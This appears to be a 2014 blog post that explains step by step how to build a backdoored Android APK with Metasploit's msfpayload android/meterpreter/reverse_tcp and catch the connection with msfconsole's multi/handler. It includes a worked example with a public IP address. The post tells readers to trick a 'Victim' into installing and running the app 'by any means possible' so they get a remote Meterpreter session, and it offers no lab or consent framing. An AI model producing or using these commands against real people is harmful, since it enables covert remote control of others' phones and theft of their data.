Sunday, January 19, 2014

Hacking ANDROID DEVICE with Metasploit Over Internet ! ;-)

1 comment:

Step #1
In terminal type..
msfpayload payload/android/meterpreter/reverse_tcp LHOST=(external IP) LPORT=4444 R > /root/Desktop/test.apk    (Here external IP is your Public IP, check your Open Port and Public IP on www.canyouseeme.org , you can change the name of "apk" file     like i have done 'test')


 
Step #2
In terminal type.. 
msfconsole

Step #3 
In msfconsole use these commands..


use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
show options
  (this command will show you bunch of options that are default and the options that you are going to change like LPORT LHOST etc)
set LHOST your_internal_IP   (eg. set LHOST 192.168.1.11)
set LPORT port_you've_forwarded   (any port you like but dont forget to port forward the port you choose, eg. set LPORT 4444 )
exploit

    Now, send the Payload/Backdoor to  your "Victim" by any means possible and make them to install and run the app, soon after victim run     the app you get the meterpreter session! ;)

    Enjoy!!, if something goes wrong please feel free to ask your doubts :)

Here is an example of this method:

1) msfpayload payload/android/meterpreter/reverse_tcp LHOST=56.23.112.211 LPORT=4444 R > /root/Desktop/TestApp.apk

2) msfconsole

   i) use exploit/multi/handler

   ii) set payload android/meterpreter/reverse_tcp

   iii) show options

   iv) set LHOST 192.168.1.11
 
   v) set LPORT 4444

   v) exploit


Now, send the Payload/Backdoor to your "Victim" by any means possible android device and make them to install and run the app, soon after victim run the app you get the meterpreter session!
Read More